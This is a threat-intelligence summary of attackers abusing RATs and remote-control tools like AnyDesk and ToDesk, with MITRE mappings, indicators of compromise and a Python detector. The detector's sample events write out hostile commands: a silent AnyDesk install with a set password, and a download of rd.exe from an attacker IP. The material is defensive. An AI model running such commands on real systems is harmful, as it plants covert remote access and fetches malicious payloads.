Attackers increasingly rely on legitimate remote access tools and backdoors to infiltrate networks, move laterally, and harvest data. The article surveys common backdoors, RATs, and remote control tools (e.g., AnyDesk, TeamViewer, ToDesk, AveMaria) used in real-world campaigns, including notable groups such as Conti, DarkSide, and Kimsuky. #AnyDesk #TeamViewer #ToDesk #RuDesktop #AveMaria #TinyNuke #Kimsuky #Remcos #AmmyyAdmin #CobaltStrike #Metasploit #WatchDog
Keypoints
- Attackers install malware by spearphishing attachments, malvertising, exploiting vulnerabilities, or posing as legitimate software to host malware on websites.
- Backdoors and RATs are frequently used to steal data, gain persistence, and enable later network movements; some are commercially sold or open-source, while others are custom-built by threat groups.
- Well-known RATs/backdoors include Remcos, AveMaria (Warzone RAT), BitRAT, RedLine, NanoCore, Gh0st RAT, Async RAT, and Quasar RAT, with groups like Kimsuky and NukeSped deploying them.
- Security frameworks like Cobalt Strike and Metasploit Meterpreter are used to breach networks, perform internal reconnaissance, and move within the target.
- Attackers abuse legitimate remote-control tools (AnyDesk, TeamViewer, ToDesk, RuDesktop) to maintain GUI access and evade security detections.
- Real-world examples show AnyDesk and other tools being repurposed by groups such as Conti, DarkSide, SmokeLoader, and Kimsuky for intrusions and internal control, including HVNC variants and SSH-based sessions.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing emails with attachments and other deception used to deliver malware. “Spear phishing emails’ attachments, malvertising, exploiting vulnerabilities, or masquerading as legitimate software to install malware.”
- [T1059.001] Command and Scripting Interpreter – PowerShell used to silently install tools and modify configurations. “PowerShell commands are executed to silently install AnyDesk and set the password ‘wocaoybb’.”
- [T1105] Ingress Tool Transfer – Malicious payloads downloaded from external addresses. “Download addresses such as hxxp://106.250.168[.]50/rd.exe: RuDesktop and hxxp://106.250.168[.]50/todesk.rar: ToDesk.”
- [T1021.001] Remote Services – Use of legitimate remote-access tools to reach and control infected systems. “AnyDesk is a representative remote desktop tool used by attackers.”
- [T1021.005] Remote Services: VNC – Remote desktop via VNC and HVNC techniques. “HVNC (HiddenDesktop/VNC) and Remote VNC commands.”
- [T1021.004] Remote Services: SSH – SSH-based remote terminal sharing via tmate. “tmate… installs, API keys are set, and a random session name is created.”
- [T1486] Data Encrypted for Impact – Ransomware activity to encrypt compromised systems. “Ultimately, internal corporate information is stolen or internal systems are encrypted.”
- [T1036] Masquerading – Attackers exploit legitimate tools (AnyDesk/TeamViewer) to evade detection. “Using remote control tools, which are legitimate programs, to evade detection by security products and…”
- [T1113] Screen Capture – RAT capabilities include screenshot capture. “Performs various malicious behaviors such as keylogging, screenshot capture, and webcam control”
- [T1056.001] Keylogging – Credential harvesting via GUI text capture. “Hooking the SetWindowsTextW() function… collected”
- [T1068] Exploitation for Privilege Escalation – Privilege escalation tools like SweetPotato used by attackers. “Installed various malware such as SweetPotato”
Indicators of Compromise
- [IP] 106.250.168.50 – Download host for RuDesktop and ToDesk payloads (example address used for rd.exe/todesk.rar).
- [IP] 183.111.148.147 – Ammyy Admin download host (mscorsvw2.exe).
- [IP] 119.201.213.146 – Ammyy Admin download host (mscorsvw2.exe).
- [IP] 58.180.56.28 – Ammyy Admin download host (mscorsvw2.exe).
- [Domain] bbq.zzhreceive.top – tmate download URL for remote session setup.
- [File hash] fe1bb6811f5c808414c4a357031c2718 – Ammyy Admin binary (MD5).
- [File hash] 1aeb95215a633400d90ad8cbca9bc300 – tmate binary (MD5).
- [Filename] rd.exe – RuDesktop payload binary.
- [Filename] mscorsvw2.exe – Ammyy Admin payload binary.
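As an added illustration (not code from the ASEC article), the following Python scans constructed process-creation events for the two patterns the technique list and indicator list above describe: a remote-control tool driven from a script interpreter with unattended switches, and contact with the listed hosts or filenames. The AnyDesk switches are assumed from its documented command line, and the events are constructed samples rather than real telemetry.

```python
import re

# Constructed process-creation events (sample data, not real telemetry) modelled on the page:
# a scripted AnyDesk install, a CLI password set, a payload fetch from the listed host, a normal launch.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "powershell.exe",
     "cmd": r'C:\Users\Public\AnyDesk.exe --install "C:\ProgramData\AnyDesk" --start-with-win --silent'},
    {"host": "WS01", "parent": "cmd.exe",
     "cmd": r'cmd /c echo wocaoybb | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password'},
    {"host": "WS02", "parent": "powershell.exe",
     "cmd": r'powershell -c Invoke-WebRequest http://106.250.168.50/rd.exe -OutFile C:\Windows\Temp\rd.exe'},
    {"host": "WS03", "parent": "explorer.exe",
     "cmd": r'"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"'},
]

# Indicators copied from the list above.
IOC_HOSTS = {"106.250.168.50", "183.111.148.147", "119.201.213.146", "58.180.56.28", "bbq.zzhreceive.top"}
IOC_FILES = {"rd.exe", "todesk.rar", "mscorsvw2.exe"}

# Remote-control tools named on the page and the AnyDesk command-line switches
# used for unattended setup (assumed from AnyDesk's documented CLI).
REMOTE_TOOLS = ("anydesk", "teamviewer", "todesk", "rudesktop", "tmate")
UNATTENDED_FLAGS = ("--install", "--silent", "--start-with-win", "--set-password")
SCRIPT_PARENTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}


def classify(event):
    """Return the list of findings for one process-creation event."""
    cmd = event["cmd"].lower()
    findings = []
    tool = next((t for t in REMOTE_TOOLS if t in cmd), None)
    flags = [f for f in UNATTENDED_FLAGS if f in cmd]
    # Interactive use from explorer.exe is normal; the same binary driven by a script
    # interpreter with unattended switches is the pattern the page describes.
    if tool and flags and event["parent"].lower() in SCRIPT_PARENTS:
        findings.append(f"scripted {tool} setup via {event['parent']}: {' '.join(flags)}")
    for host in IOC_HOSTS:
        if host in cmd:
            findings.append(f"listed host {host}")
    for name in IOC_FILES:
        if re.search(r"[\\/]" + re.escape(name) + r"\b", cmd):
            findings.append(f"listed filename {name}")
    return findings


def scan(events):
    """Map each host to the findings raised by its events (hosts with none are omitted)."""
    report = {}
    for ev in events:
        for finding in classify(ev):
            report.setdefault(ev["host"], []).append(finding)
    return report
```

Running `scan(SAMPLE_EVENTS)` flags WS01 for the scripted install and password set and WS02 for the listed host and filename, while the interactive launch on WS03 raises nothing.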
Read more: https://asec.ahnlab.com/ko/39761/